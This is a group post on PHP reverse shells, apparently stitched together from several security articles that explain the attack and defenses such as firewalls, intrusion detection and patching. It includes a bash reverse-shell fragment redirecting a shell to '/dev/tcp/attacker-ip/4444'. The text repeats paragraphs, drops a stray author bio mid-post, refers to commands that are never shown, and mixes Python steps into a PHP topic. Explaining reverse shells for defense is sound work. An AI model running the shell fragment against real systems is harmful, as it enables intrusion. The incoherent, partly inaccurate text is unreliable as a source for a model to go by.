Php Reverse Shell

Katja Gains

Jul 9, 2024, 12:11:31 PM7/9/24
to placansourfing

Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the target machine. Therefore it is a severe security threat. This method is also commonly used in penetration tests.

For hosts protected by a network address translation (NAT), a reverse shell may be necessary for performing maintenance remotely. Although there are legitimate uses for reverse shells, cybercriminals also use them to penetrate protected hosts and perform operating system commands. Reverse shells allow attackers to bypass network security mechanisms like firewalls.

An attacker may exploit command injection vulnerabilities on a server to compromise the system. In the injected code, a reverse shell script provides a command shell enabling additional malicious actions.

The following command takes the file descriptor generated by the previous socket command, and duplicates it three times, overwriting the data streams stdin, stdout, and stderr with the reverse shell socket we created. s.fileno() refers to the file descriptor of the socket.

The final stage of the attack is to run the Python subprocess module. This allows the reverse shell to run a program as a subprocess of the socket. The subprocess.call command lets us pass any executable program. By passing /bin/sh, we run a Bash shell as a sub-process of the socket we created.

Reverse shell connections are often malicious unless you set them up for the explicit purpose of remote administration. From a server perspective, it is difficult to block all reverse shell connections when using a networked system such as a server. The following steps can help you harden your system and mitigate the risk:

There is only so much you can do to harden a server. An additional approach to preventing reverse shells is to block malicious network communication. Web Application Firewalls (WAF) and Runtime Application Self-Protection (RASP) solutions can detect communication patterns that look like a reverse shell connection and block them.

To gain control over a compromised system, an attacker usually aims to gain interactive shell access for arbitrary command execution. With such access, they can try to elevate their privileges to obtain full control of the operating system. However, most systems are behind firewalls and direct remote shell connections are impossible. One of the methods used to circumvent this limitation is a reverse shell.

The primary reason why reverse shells are often used by attackers is the way that most firewalls are configured. Attacked servers usually allow connections only on specific ports. For example, a dedicated web server will only accept connections on ports 80 and 443. This means that there is no possibility to establish a shell listener on the attacked server.

On the other hand, firewalls usually do not limit outgoing connections at all. Therefore, an attacker may establish a server on their own machine and create a reverse connection. All that the attacker needs is a machine that has a public (routable) IP address and a tool such as netcat to create the listener and bind shell access to it.

It is very simple to create reverse shells using different tools and languages. First, you need a listener on your local machine with a public IP. For example, on a Linux machine, all you need is the following netcat command:

Reverse shells on their own are always a result of some other kind of attack, for example, an SQL Injection attack. Therefore, the best way to avoid reverse shells is to protect against attacks that allow impostors to gain shell access in the first place.

A shell is a user interface for access to operating system services. A reverse shell is a remote shell, where the connection is made from the system that offers the services to the client that wants to use these services.

To create a reverse shell, you need to open a client machine port that is accessible from the Internet. Then, you need to run a listener on the client machine. Finally, you need to run a command on the server that establishes a connection with the client listener.

There is no way to completely block reverse shells. You can only make it more difficult to create one by blocking most outgoing ports (if possible) and turning off most services (if possible). You can also monitor all traffic outgoing from the server for potential shell commands.

To create a reverse shell, the attacker must first have the ability to run commands on your server. To prevent vulnerabilities that let attackers run commands, you should regularly scan your server using a vulnerability scanner.

Reverse shells are often the only way to perform remote maintenance on hosts behind a NAT, so they have legitimate administrative uses. However, they can also be used by cybercriminals to execute operating system commands on hosts protected from incoming connections by a firewall or other network security systems. For example, a piece of malware installed on a local workstation via a phishing email or a malicious website might initiate an outgoing connection to a command server and provide hackers with a reverse shell capability. Firewalls mostly filter incoming traffic, so an outgoing connection to a listening server will often succeed.

When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities.

To start with, the attacker needs to start a listener process on their system to listen for reverse shell connections incoming to their IP address, for example 10.0.0.123. On Linux, this can be as simple as one netcat command:

Cybersecurity writer and blog managing editor at Invicti Security. Drawing on years of experience with security, software development, content creation, journalism, and technical translation, he does his best to bring web application security and cybersecurity in general to a wider audience.

Reverse shells have legitimate administrative uses, as they are often the only way to perform remote maintenance on hosts behind a NAT. However, cybercriminals can use the same technique to execute operating system commands on hosts protected by firewalls and other cybersecurity systems.

For example, malware, installed on local workstations via phishing or malicious websites, can initiate an outbound connection to a command and control (C&C) server, and provide hackers with reverse shell capabilities. Firewalls primarily filter incoming traffic, so outgoing connections to the receiving server are usually successful.

A reverse shell attack is often the second stage of an attempt to exploit command injection vulnerabilities in a server. The attacker typically injects code that includes a reverse shell script. This provides a convenient command shell for further malicious activity.

Bash (short for Bourne Again SHell) is a Unix shell that is commonly used on Linux and other Unix-like operating systems. Here is a code example of a Bash reverse shell that can be used to establish a command shell on a remote machine:

This code assumes that the attacker has started a listener on their machine using the nc (netcat) utility, which is listening on a specified port (in this case, 4444). The second line of code, which is executed on the target machine, uses Bash to open a connection back to the listener and establish a command shell. The bash -i command tells Bash to run in interactive mode, which allows the attacker to enter commands at the command prompt. The >& /dev/tcp/attacker-ip/4444 and 0>&1 arguments redirect the input and output of the Bash shell to the connection with the listener, effectively establishing a reverse shell.

The attacker establishes a command shell on a remote machine by exploiting a vulnerability in the target system and using PHP, a server-side scripting language, to execute commands on the target machine:

The PHP code uses the fsockopen() function to open a connection to the listener and the exec() function to execute the /bin/sh shell and redirect its input, output, and error streams to the connection with the listener.

Static application security testing (SAST) is a method for detecting application security issues before an application is deployed. It is a software testing strategy that analyzes code for exploitable vulnerabilities before an application goes into production. Developers use SAST to identify and remediate vulnerabilities before cybercriminals can exploit them.

A key focus on security testing is user inputs. Any input should be considered potentially malicious. User inputs are the main vector used for code injection attacks, and those are the most common way to inject reverse shell scripts into a target system.

Phishing messages, in particular email messages, are a common way for attackers to penetrate remote systems and deploy a remote shell. All employees should receive cybersecurity education to avoid opening and interacting with suspicious messages. However, since phishing attacks are becoming more sophisticated, and not all users are vigilant, it is important to deploy email security systems that can identify and block malicious messages.

Closely monitor inbound and outbound traffic on sensitive systems to discover any anomalous access attempt. In the case of a reverse shell attack, identify if someone is trying to access a system from an IP address that is not on the whitelist. This is a good way to detect an attack early in the kill chain.

An intrusion detection system (IDS) can also be an important defense against reverse shells, because it can detect malicious communication, such as a reverse shell communicating with a C&C server, and block it in real time.

Attackers often exploit existing code injection vulnerabilities to execute shell scripts and escalate to root privileges. Therefore, it is critical to patch web applications and servers regularly and test them with trusted vulnerability scanners.
